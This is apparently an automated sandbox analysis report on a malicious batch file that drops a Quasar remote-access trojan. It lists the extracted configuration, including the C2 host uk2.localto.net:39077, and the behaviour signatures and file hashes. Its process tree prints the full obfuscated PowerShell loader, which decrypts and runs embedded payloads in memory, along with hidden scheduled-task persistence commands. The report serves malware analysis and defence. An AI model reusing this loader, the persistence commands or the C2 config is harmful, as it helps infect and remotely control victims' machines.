Analysis
-
max time kernel
24s -
max time network
27s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
21-04-2024 00:56
Static task
static1
General
-
Target
Uni.bat
-
Size
1.8MB
-
MD5
14516087f9549022d5582272910428b1
-
SHA1
53324370839fa1c07bfa42cf7cb3039513805d42
-
SHA256
745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
-
SHA512
cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
-
SSDEEP
24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy
Malware Config
Extracted
quasar
1.4.1
SLAVE
uk2.localto.net:39077
cc0a2b76-665e-4e16-b318-5ee02270fbcd
-
encryption_key
D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
-
install_name
UpdateHost.exe
-
log_directory
Error Logs
-
reconnect_delay
3000
-
startup_key
WOS64
-
subdirectory
Windows
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2976-54-0x0000010AAC4D0000-0x0000010AAC7F4000-memory.dmp family_quasar -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
UpdateHost.exepid process 1868 UpdateHost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exeUpdateHost.exepid process 1096 powershell.exe 1096 powershell.exe 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe 2976 powershell.exe 2976 powershell.exe 2976 powershell.exe 1868 UpdateHost.exe 1868 UpdateHost.exe 1868 UpdateHost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeIncreaseQuotaPrivilege 4512 powershell.exe Token: SeSecurityPrivilege 4512 powershell.exe Token: SeTakeOwnershipPrivilege 4512 powershell.exe Token: SeLoadDriverPrivilege 4512 powershell.exe Token: SeSystemProfilePrivilege 4512 powershell.exe Token: SeSystemtimePrivilege 4512 powershell.exe Token: SeProfSingleProcessPrivilege 4512 powershell.exe Token: SeIncBasePriorityPrivilege 4512 powershell.exe Token: SeCreatePagefilePrivilege 4512 powershell.exe Token: SeBackupPrivilege 4512 powershell.exe Token: SeRestorePrivilege 4512 powershell.exe Token: SeShutdownPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeSystemEnvironmentPrivilege 4512 powershell.exe Token: SeRemoteShutdownPrivilege 4512 powershell.exe Token: SeUndockPrivilege 4512 powershell.exe Token: SeManageVolumePrivilege 4512 powershell.exe Token: 33 4512 powershell.exe Token: 34 4512 powershell.exe Token: 35 4512 powershell.exe Token: 36 4512 powershell.exe Token: SeIncreaseQuotaPrivilege 4512 powershell.exe Token: SeSecurityPrivilege 4512 powershell.exe Token: SeTakeOwnershipPrivilege 4512 powershell.exe Token: SeLoadDriverPrivilege 4512 powershell.exe Token: SeSystemProfilePrivilege 4512 powershell.exe Token: SeSystemtimePrivilege 4512 powershell.exe Token: SeProfSingleProcessPrivilege 4512 powershell.exe Token: SeIncBasePriorityPrivilege 4512 powershell.exe Token: SeCreatePagefilePrivilege 4512 powershell.exe Token: SeBackupPrivilege 4512 powershell.exe Token: SeRestorePrivilege 4512 powershell.exe Token: SeShutdownPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeSystemEnvironmentPrivilege 4512 powershell.exe Token: SeRemoteShutdownPrivilege 4512 powershell.exe Token: SeUndockPrivilege 4512 powershell.exe Token: SeManageVolumePrivilege 4512 powershell.exe Token: 33 4512 powershell.exe Token: 34 4512 powershell.exe Token: 35 4512 powershell.exe Token: 36 4512 powershell.exe Token: SeIncreaseQuotaPrivilege 4512 powershell.exe Token: SeSecurityPrivilege 4512 powershell.exe Token: SeTakeOwnershipPrivilege 4512 powershell.exe Token: SeLoadDriverPrivilege 4512 powershell.exe Token: SeSystemProfilePrivilege 4512 powershell.exe Token: SeSystemtimePrivilege 4512 powershell.exe Token: SeProfSingleProcessPrivilege 4512 powershell.exe Token: SeIncBasePriorityPrivilege 4512 powershell.exe Token: SeCreatePagefilePrivilege 4512 powershell.exe Token: SeBackupPrivilege 4512 powershell.exe Token: SeRestorePrivilege 4512 powershell.exe Token: SeShutdownPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeSystemEnvironmentPrivilege 4512 powershell.exe Token: SeRemoteShutdownPrivilege 4512 powershell.exe Token: SeUndockPrivilege 4512 powershell.exe Token: SeManageVolumePrivilege 4512 powershell.exe Token: 33 4512 powershell.exe Token: 34 4512 powershell.exe Token: 35 4512 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 1892 wrote to memory of 1096 1892 cmd.exe powershell.exe PID 1892 wrote to memory of 1096 1892 cmd.exe powershell.exe PID 1096 wrote to memory of 4512 1096 powershell.exe powershell.exe PID 1096 wrote to memory of 4512 1096 powershell.exe powershell.exe PID 1096 wrote to memory of 3624 1096 powershell.exe WScript.exe PID 1096 wrote to memory of 3624 1096 powershell.exe WScript.exe PID 3624 wrote to memory of 1140 3624 WScript.exe cmd.exe PID 3624 wrote to memory of 1140 3624 WScript.exe cmd.exe PID 1140 wrote to memory of 2976 1140 cmd.exe powershell.exe PID 1140 wrote to memory of 2976 1140 cmd.exe powershell.exe PID 2976 wrote to memory of 4300 2976 powershell.exe schtasks.exe PID 2976 wrote to memory of 4300 2976 powershell.exe schtasks.exe PID 2976 wrote to memory of 1868 2976 powershell.exe UpdateHost.exe PID 2976 wrote to memory of 1868 2976 powershell.exe UpdateHost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_590_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_590.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_590.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_590.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_590.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_590.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55753571cfc81f894ff82dc383591df11
SHA154dff38cbb912d61f7f2035f97d4dd75cb1a9f04
SHA256c729a5004a163727dcc457585cd06d0ddee9c4a80327bd97383d08fd8ce413bf
SHA51283483e2b4a2ffc2a7f7d38160d3e28f0fbeeac30563f57c8d5a6a9b32069a67ddddfb823c9ff1ae8fd057dfc53b8c8e43e58e0ca5907487b472e3152d21e1fb6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m42l5o2g.4hc.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Roaming\startup_str_590.batFilesize
1.8MB
MD514516087f9549022d5582272910428b1
SHA153324370839fa1c07bfa42cf7cb3039513805d42
SHA256745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
SHA512cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
-
C:\Users\Admin\AppData\Roaming\startup_str_590.vbsFilesize
115B
MD5fc620f1ab5a3a971335dc5dcec6f7e3e
SHA12fe328d3fc49cef49dbade3a059325432e4433f3
SHA2562d1813e296fafc65fef73a4ccfa3e48cbe553d1a54fc5334e6436644e29a6543
SHA512f1e5598e04bed8789da16da4830a9a86c95db9081ed838a67a05f9423c87246ad9417c0a6b7d5ac0380aa11f4f0c7fd27ba48e1aba2766b878b941bd11bf2b74
-
memory/1096-42-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmpFilesize
10.8MB
-
memory/1096-15-0x000001FD67480000-0x000001FD675D8000-memory.dmpFilesize
1.3MB
-
memory/1096-10-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmpFilesize
10.8MB
-
memory/1096-14-0x000001FD67450000-0x000001FD67458000-memory.dmpFilesize
32KB
-
memory/1096-13-0x000001FD650F0000-0x000001FD65100000-memory.dmpFilesize
64KB
-
memory/1096-12-0x000001FD650F0000-0x000001FD65100000-memory.dmpFilesize
64KB
-
memory/1096-11-0x000001FD650F0000-0x000001FD65100000-memory.dmpFilesize
64KB
-
memory/1096-41-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmpFilesize
10.8MB
-
memory/1096-5-0x000001FD671E0000-0x000001FD67202000-memory.dmpFilesize
136KB
-
memory/1868-72-0x000001D5C0C40000-0x000001D5C0CB6000-memory.dmpFilesize
472KB
-
memory/1868-71-0x000001D5BE760000-0x000001D5BE770000-memory.dmpFilesize
64KB
-
memory/1868-70-0x000001D5C09F0000-0x000001D5C0A34000-memory.dmpFilesize
272KB
-
memory/1868-60-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmpFilesize
10.8MB
-
memory/2976-52-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmpFilesize
10.8MB
-
memory/2976-54-0x0000010AAC4D0000-0x0000010AAC7F4000-memory.dmpFilesize
3.1MB
-
memory/4512-32-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmpFilesize
10.8MB
-
memory/4512-29-0x000001F160490000-0x000001F1604A0000-memory.dmpFilesize
64KB
-
memory/4512-28-0x000001F160490000-0x000001F1604A0000-memory.dmpFilesize
64KB
-
memory/4512-18-0x000001F160490000-0x000001F1604A0000-memory.dmpFilesize
64KB
-
memory/4512-17-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmpFilesize
10.8MB